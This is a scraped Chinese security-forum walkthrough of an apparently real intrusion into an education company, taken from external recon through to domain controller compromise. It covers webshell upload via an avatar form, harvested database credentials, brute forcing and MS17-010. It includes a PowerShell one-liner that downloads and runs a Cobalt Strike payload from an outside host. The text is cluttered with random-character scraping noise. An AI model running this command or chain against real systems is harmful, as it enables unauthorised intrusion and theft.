中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

0 T1 o/ h$ p/ s7 p& G7 k& U 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路! i; N- t# c# T) t I( g# W2 b! F

7 e' R3 s6 \. r" w: |! M$ f3 R1 X* o

. m; P7 k8 Y8 ^" A+ N' v" J7 ?. X  & ]7 w; O" {1 Y- q# m! l6 h

9 Q- v; {- j0 A% @

, [/ D: p8 M) w3 N 正文 2 F3 a% f2 b* o

, M+ I% X3 }* |0 ^

/ j+ Y$ ]2 Y7 p7 z- B  8 T+ A& A3 ~6 R

1 t! v, I/ M+ k1 J0 ]. ^+ q

1 ?5 {: `6 Y( m6 v6 {! T0 g! V& q, r 目标:www.xxxx.com(一家教育机构)
3 j$ c( |) y0 w5 O) u6 ? 打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能6 R! Y# [& y7 [' o- D& }

5 F* i. N! X4 e. V3 n6 p4 N7 c

$ A; f! p; K e( |4 o) h- n vshapes= 0 f8 _8 b1 U. h1 `* a

; `* Z* \ v8 d* U/ F

: G, G/ d/ r1 G8 n$ w, N! N5 s 进行了简单的信息搜集
) L# j% {4 ]7 w/ h
% b; `& P. n$ K 6 \: D" Q$ w/ L1 r6 U9 s: X

! [. i3 T* }# d8 w

+ a0 P# o, I* I T- ?1 g 子域名搜集 , I( `: H- ?) s' M/ V# m( }, `

2 \; m1 Q" ^* N: `0 F; l+ v

/ |" p1 f p7 J9 k3 u) { vshapes= 8 o0 S" x, c0 d* H

3 p. F7 l* a& ?4 e

" B b$ p4 I5 ]. x: J fofa找资产
" z: W8 [; b8 S! o
( W$ g1 G- m( c+ j( c: e/ i, \ % W+ `5 A0 u! b

1 U5 D) f4 b6 A6 s* W5 }

7 S3 U ?( S; N vshapes= : w! D f/ F: k: u" P" x5 b

3 |6 N- d- \( H- s, R; W

/ K9 s" q- s) x- @ 一共七个资产。去重之后只有两个。
6 |# C" k, a5 }9 |6 Y6 Q
5 n! R @( q" W1 T 1 p, \! ~9 ~/ {: [

0 p3 q$ L+ O0 s5 r% B

0 p6 s h6 b: G6 i8 V: H 目录探测+ x4 Y, Y1 h5 `7 I

& f+ M; S, T' l7 ?$ H9 h

) X6 s. y7 \, \' O% w vshapes=/ O# r P0 ?: l, F

& }/ Y2 Y4 F5 y; P5 H( u

. c; Q) L! E( p9 X7 O% x 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 V+ f$ m7 F4 S# J; C9 M7 ~
' z9 x: ~, T5 U; b + z) ~! M5 {/ {# L0 Z

7 a8 s: I }* a9 ?; u

6 ?$ m B" f; p6 E/ Z# ` 我又尝试了通过修改返回包来绕过登录界面: r' _ j- B. `! l

5 E) j0 g5 P- D

3 y4 |- l! ^8 k, E7 \* A vshapes= # b) r- n: A: Q: L: B" j: c

" F( L& l4 R( _

+ J1 u8 N# J1 t w! x 还是不行,尝试注入无果 P# r" f1 g7 C( ]. q, Q

9 `; b/ M* n* {3 h

0 z& X: ^6 F4 ?: D3 l vshapes=- g- F; T. B: a, b2 j

2 |% y$ \7 n, M' [

% Z" x) c( j! D0 V W4 y' ~; Q 不过我目录探测出了一处Spring信息泄露
$ z0 ~0 g* O+ R8 }* o/ r; h
7 U6 N. H: E: `" q / B5 I8 S) q) J0 t" M* K

e) H* {3 v. Y; }

2 _" p; _) G/ z9 m vshapes= 2 |' x p( v Q/ f* M

' L" Q. w2 N! f6 j/ }# W( c

+ P4 z) m" ?, D) o- j. B" ~ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录$ b2 y6 r; v: W: B3 K! B+ `" Z- o% w; ?

" O6 L* P' r/ i3 H9 V! M, {

1 j% a% W' w: R: @ vshapes= , c* C1 `5 E' W1 t

5 B- |" p7 T: A5 a; o; d. D

8 |2 H- Q9 n2 F+ l6 H5 S% ~ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。: q9 `" |' V& O1 O0 |- x0 \4 F

+ A2 W2 L+ } m: I3 d' @

. h" K4 R% |7 I" x1 k# N) Y+ x vshapes= 6 C. s& _$ E$ @" ]. i$ L+ x' q

# a( N' ], D- l2 d0 P1 Y

4 E6 g6 x- I# h2 j. c) o 获取有些师傅到这一步就手机抓包电脑测了。 # |& d: M& o% S. l5 d& m+ }

E2 ]8 r+ X: g( e3 ~

6 I8 s0 T/ ]- i: G# A8 L Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。8 \# t' t2 v% ~

$ j3 g% E2 t. Z4 l- M

8 Y. i0 q& B6 C2 d1 }/ h' { 其中在一个公众号发现了小程序,可以进行注册。 4 P8 P7 N6 s- r' v6 i0 {' q

- m+ y' y+ h3 ]+ Q2 @. B

; S( t/ b3 r" T! s5 @& h 看到了头像上传,尝试上传获取WebShell' j5 A0 |! e! T9 z* e7 l# O

' i: p, O) U( M% H- n

% i( p# Z( P% Y+ {+ R* I vshapes=9 s5 m8 @$ R) F, k; G' t

# U: ]) }8 {$ Q: J2 u4 f

' B3 o! K a2 L 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 7 ?7 K) z. {& @# n, W+ `1 W+ t

, g) B7 s; L% x* Q1 B) j

* K0 ~- F# f' u9 n" Z$ H2 O vshapes=$ i" F5 b9 Q/ o2 M, i2 V8 i* ~

6 \; W, b9 @, w1 o7 ~

! j' n. B2 I1 e; U9 V% B 然后上了大马9 [' |0 d2 N. G7 L' D6 S

G8 s; O# A! d

0 p- K0 }) N" A1 w; r- V6 X vshapes= |1 B) [+ X4 @2 P S

8 v& Q2 @8 I( h5 ~+ ]

* k0 K/ N& W% H vshapes=% ^' w8 z1 a: o) o* i3 q6 v

8 {" D3 Z) u& q

% ^; G/ \6 l7 h( `- M2 m 通过翻找文件发现数据库账号密码( ~! E7 L$ y1 @) E

7 b0 {6 L+ D) n3 C- c, u

2 C- l4 `5 k0 s+ F# Y# s vshapes= ; N6 v: I; x# s- n

' |. U: N; z0 n) O5 v

$ g$ \/ I+ e6 y7 S+ {4 V# ?" w --内网渗透 ! V1 l. s& q6 B2 D& e

5 b, C/ y4 U& y0 Z

" G/ a" g) E( P1 I" a" Z0 P# \+ T 直接通过powershell执行 cs上线$ _. w2 z# F" R# }& N

" {( U( W7 Y) z+ e; b

S9 ~7 X% J; i$ V powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" . |# S* h4 y4 V9 m6 H6 [: o

8 L; A+ S/ O; B4 {- c

8 o2 o) _: s/ o2 ~3 B& _8 E vshapes=( }1 s3 u$ C+ A" w9 g) U

7 Q4 s& ?$ ]! I( i

+ m- k7 p* @8 e) ] 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 8 f; o& X# J9 K' E

2 w S% y, S F

$ h; d9 x4 I- z. H( s0 v vshapes=6 R( k8 w. @$ P5 v

! Q u( l# W. Z3 E q

( m d/ [, y# Z! e/ M 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
5 k0 w/ j# V. l: @( i, u
+ ?* m: ?6 Z! g
, x7 ~* w+ [8 m ! U X( a5 y: [: F

^ w) P* _# b& F) S' r7 t7 @' @$ g

/ ?! y/ S; ^- M: A vshapes=: N; {/ i1 T; T" S: O

4 A' \, }; R* _- ?$ S& M' }

Q7 s2 u( a' y* q& ] 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
; l7 X) U0 i6 n( N2 x' v
( E3 p l% ~1 {2 T4 A / d4 r) q. t5 m6 p4 C4 T; F

. U8 `6 ~! q2 x2 T

7 z* ~% [1 `2 M( [$ s7 j# t9 d vshapes= , D, R2 i5 _' a( {) }' Y9 ]# z

* M, I- j- w: }/ C% _6 Y

: W d# ^& A6 P
0 { w" t4 g8 Z5 q D: R1 J
% a& c' _. I9 y. v( k) V9 c3 e' I 3 t8 T7 _1 ~+ I7 z8 b( M

; Q8 ~* j1 M) ^

6 |! z- ~: ]: `. m  " o5 ^, ]0 s4 D# R5 R

2 }7 G% @) Y* ]) M; N6 Z" S4 P

( l6 g8 B/ C8 g1 V! n 小结6 D5 O; y! m/ s" U

, G1 p _8 ]! Z0 u

5 }( {+ U* z( S5 u8 b   9 X! U7 I, j$ n4 \, o

* m5 r. Z" A1 ~' N ^, Z) E

& y0 s( m, a4 ^6 Y3 b( K0 g 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! & ]" ?" y1 J o

7 a) a0 k, K2 a3 S# h. L/ `

`7 D0 M) t* L6 ]  ( g8 V0 e$ P& L( O; N

6 C. H+ Q4 C' T4 c 1 J1 X7 |3 A4 {" v9 [

6 e1 E& a1 H2 y- V+ n) O' C 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 8 u p+ {# n3 V, M3 o

' D: o6 _, f: Y4 b- u- X! l0 t

( h' ?1 t* ~$ Y8 c S$ \" {& ]  ) X9 r; ?3 Q0 S$ U+ B+ Z





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2